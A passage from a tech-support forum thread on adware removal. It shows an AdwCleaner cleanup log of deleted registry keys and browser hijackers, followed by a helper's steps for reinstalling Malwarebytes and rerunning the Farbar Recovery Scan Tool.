Deleted HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1722513563-2756437970-1780137624-1000\Software\SweetIM
Deleted HKLM\Software\Wow6432Node\{DAF8B7E5-449D-4180-8281-10E536E597F2}

***** [ Chromium (and derivatives) ] *****

Deleted User-Agent Switcher for Chrome
Deleted Movies Toolbar

***** [ Chromium URLs ] *****

Deleted AVG Secure Search
Deleted Ask
Deleted Ask
Deleted Ask
Deleted AOL
Deleted AOL
Deleted AOL

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [6602 octets] - [03/11/2018 21:57:34]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
 

Broni

Malware Annihilator
1. Uninstall Malwarebytes' Anti-Malware using Add/Remove (Programs & Features) programs in the control panel.
2. Restart your computer (very important).
3. Download and run this utility.
4. It will ask to restart your computer (please allow it to).
5. After the computer restarts, install the latest version from here.
 

Bruce Betts

TS Rookie
Hello, sorry something came up.
I've just reinstalled malwarebytes after cleaning it with the utility, I still get the same error
 

Broni

Malware Annihilator
Re-run Farbar Recovery Scan Tool (FRST/FRST64) you ran at the very beginning of this topic.

  • Double click to run it.
  • Make sure you checkmark Addition.txt box.
  • Press Scan button.
  • Scan will create two logs, FRST.txt and Addition.txt in the same directory the tool is run. Please copy and paste them to your reply.
 
Status
Not open for further replies.